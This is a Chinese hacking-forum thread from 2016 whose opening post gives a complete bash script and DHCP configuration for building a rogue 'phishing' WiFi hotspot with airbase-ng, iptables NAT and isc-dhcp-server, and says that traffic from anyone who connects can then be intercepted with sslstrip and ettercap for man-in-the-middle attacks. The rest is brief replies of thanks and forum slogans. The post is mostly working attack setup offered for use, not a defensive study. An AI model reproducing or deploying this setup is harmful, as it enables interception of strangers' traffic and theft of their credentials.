请选择 进入手机版 | 继续访问电脑版
查看: 10389|回复: 2190

没啥技术含量 WiFi钓鱼

[复制链接]
  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-3-6 13:14:13 | 显示全部楼层 |阅读模式
    本帖最后由 90_ 于 2016-3-6 13:19 编辑

    具体的技术细节记录一下,具体的shell脚本如下:

    [AppleScript] 纯文本查看 复制代码
    #! /bin/bash
    case $1 in
        “start”)
           sleep 1
           ifconfig wlan2 down
           sleep 1
           iwconfig wlan2 mode monitor
           sleep 1
           ifconfig wlan2 up
           sleep 2
           airmon-ng start wlan2
           sleep 1
           airbase-ng -e hellotest  -c 11 wlan2
           sleep 1
        ;;
        “atup”)
           sleep 1
           ifconfig at0 up
           sleep 1
           ifconfig at0 10.0.0.1 netmask 255.255.255.0
           sleep 1
           route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
           sleep 1
           echo “1” >/proc/sys/net/ipv4/ip_forward
           sleep 2
           dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
           sleep 2
           service isc-dhcp-server start
           sleep 1
        ;;
        “startnat”)
           sleep 1
           iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
           sleep 1
           iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
           sleep 1
           iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356
           sleep 2
        ;;*)
           echo “Usage $0 {start|atup|startnat}”
        ;;
        esac



    将以上shell脚本保存为cr_wifi.sh,然后依次执行:

    ./cr_wifi.sh start

    ./cr_wifi atup

    ./cr_wifi startnat

    执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。

    以上shell脚本主要有三个部分:

    1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;

    2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;

    3,添加iptables规则,配置NAT。

    执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:

    [AppleScript] 纯文本查看 复制代码
    ddns-update-style none;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.1 10.0.0.25;
    option domain-name-servers 114.114.114.114;
    # option domain-name internal.example.org;
    option routers 10.0.0.1;
    option broadcast-address 10.0.0.250;
    default-lease-time 600;
    max-lease-time 7200;
    }

    评分

    参与人数 3i币 +17 收起 理由
    aimet + 3 感谢分享
    Jerry07 + 3
    wuyan + 11 支持原创

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2016-3-6 13:56:46 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-7 00:03:23 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2018-8-20 20:39
  • 签到天数: 198 天

    [LV.7]常住居民III

    发表于 2016-3-7 09:11:11 | 显示全部楼层

    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-7 12:51:30 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-3-7 22:21:28 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-8 00:23:39 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-8 09:01:13 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2016-3-8 13:03:10 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-8 19:30:31 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表